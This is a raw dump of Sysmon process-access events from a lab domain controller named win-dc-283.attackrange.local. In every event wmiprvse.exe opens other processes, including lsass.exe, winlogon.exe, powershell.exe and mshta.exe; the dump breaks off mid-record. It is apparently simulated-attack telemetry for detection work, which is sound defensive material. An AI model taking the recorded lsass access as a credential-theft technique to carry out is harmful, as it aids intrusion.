15:59:16.788{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023113Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.788{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023112Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.788{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023111Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-3206-00000000A301}1108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023110Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-3106-00000000A301}4880C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023109Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-3006-00000000A301}3232C:\Windows\SysWOW64\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023108Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023107Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023106Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023105Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023104Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023103Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023102Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023101Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023100Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023099Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023098Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023097Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023096Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023095Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023094Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.585{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program 